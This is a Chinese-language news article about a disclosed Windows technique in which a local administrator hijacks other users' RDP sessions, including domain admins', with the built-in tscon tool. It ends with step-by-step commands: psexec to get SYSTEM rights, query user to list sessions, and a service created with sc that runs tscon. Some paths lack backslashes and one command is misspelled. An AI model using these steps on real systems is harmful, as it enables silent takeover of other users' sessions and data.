3月20日訊 國外安全研究人員亞歷山大·科茲尼科夫已經公布了一種能夠輕松獲取最高級別網絡訪問權限,而不需要任何密碼的方法。
亞歷山大·科茲尼科夫在一篇博文中指出,諸如系統權限管理員等高權限用戶能夠利用內置命令行工具劫持另一登錄用戶的會話,即使其擁有更高權限。而如果其他登錄用戶為域管理員,則對其會話進行劫持將允許本地管理員完全訪問包括域服務在內的整個網絡。
他警告稱,利用這項技術,管理員將能夠在不觸發任何警告的情況下完成會話劫持。
亞歷山大·科茲尼科夫指出,他的這項技術方案不僅能夠用于劫持更高權限用戶的會話,同時還可用于幫助系統管理員獲取低權限帳戶的訪問能力,例如用于訪問高敏感度企業應用程序或者企業數據庫。
亞歷山大·科茲尼科夫舉例解釋:
“銀行雇員可以使用計費系統及其憑證進行登錄。假設這位雇員登錄至計費系統并開始工作,而后在午餐時間離開并將自己的工作站設備鎖定。這時,系統管理員能夠利用自己的帳戶登錄至該工作站。盡管根據銀行規定,管理員不應訪問計費系統; 但在Windows的內置命令中,管理員完全能夠在不進行解鎖的前提下劫持員工桌面。也就能夠在該計費系統中隨意操作,且擁有與對應雇員相等的一切權限。”
整個過程只需要半分鐘左右即可完成,感興趣的朋友可以點擊此處(需翻墻)查看由其發布的概念驗證視頻。
亞歷山大·科茲尼科夫將此稱為一項“高危安全漏洞”,但他自己也承認,他并不確定這到底屬于嚴重缺陷抑或是Windows內有意為之的正常功能。
微軟公司在其說明文檔內解釋了亞歷山大·科茲尼科夫在報告中所提及的各款命令行工具的適用范圍與限制,并表示該工具會在用戶輸入錯誤密碼后失效。然而亞歷山大·科茲尼科夫對此予以否認。
安全研究人員凱文·博蒙特在推文中確認了這項bug,并表示劫持帳戶確實“非常輕松”。
亞歷山大·科茲尼科夫稱,他已經在Windows 7、Windows 10以及Windows Server 2008與Windows Server 2012 R2上測試了這項bug,凱文·博蒙特則表示這項bug實際上在目前全部受支持的Windows版本上皆可奏效。
不過亞歷山大·科茲尼科夫尚未將這項問題報告給微軟公司。他表示:
“攻擊者并不需要使用metasploit、incognito或者mimikatz等常見的用戶憑證操縱或者登錄模擬工具,每一項操作都通過內置命令進行。每一位管理員都能夠冒充任何登錄用戶以實現對其系統的本地物理或者遠程桌面訪問。遺憾的是,我并不確定該如何進行修復,也提不出什么有效的建議。向微軟報告后需要等待六個月才能讓問題得以解決,而我希望盡快向大家發出通道。”
亞歷山大·科茲尼科夫只是類似問題的發現者之一。早在2011年,法國安全研究人員本杰明·德爾就曾經公布過類似的會話劫持漏洞。
之后,微軟公司的發言人表示,這項所謂缺陷“并不屬于安全漏洞,因為其需要在設備上獲得本地管理權限。”
附安全研究詳情能夠獲得NT AUTHORITY/SYSTEM命令執行許可的高權限用戶可輕松劫持任何已登錄用戶的會話,且無需了解其登錄憑證。終端服務會話可處于連接或者斷開狀態。
此項高危安全漏洞允許任何本地管理員實現如下會話劫持與訪問能力:
1. 域管理員會話。
2. 劫持用戶正在處理且尚未保存的任何文檔。
3. 任何被劫持用戶此前曾經登錄的其它系統/應用程序(可能包括其它遠程桌面會話、網絡共享映射、要求其它憑證方可登錄的應用程序以及電子郵件等)。
此項安全漏洞被證實作用于:
Windows 2012 R2
Windows 2008
Windows 10
Windows 7
微軟公司的官方說明文檔幫助我們利用以下命令行操作完成測試:
https://technet.microsoft.com/en-us/library/cc771505(v=ws.11).aspx我們只需要 NT AUTHORITY/SYSTEM 命令行。
最簡單的方法為使用psexec,但其要求存在psexec.exe文件:
psexec -s \localhost cmd另一種方法為創建一項負責與全部選定會話對接的服務。
1、獲取全部會話信息:
C:Windowssystem32>query user USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME administrator 1 Disc 1 3/12/2017 3:07 PM>localadmin rdp-tcp#55 2 Active . 3/12/2017 3:10 PMC:Windowssystem32>2、 創建用于劫持用戶會話的服務:
C:Windowssystem32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"[SC] CreateService SUCCESS3、啟動此服務:
net setart sesshijack在此之后,您的當前會話將被替換為目標會話。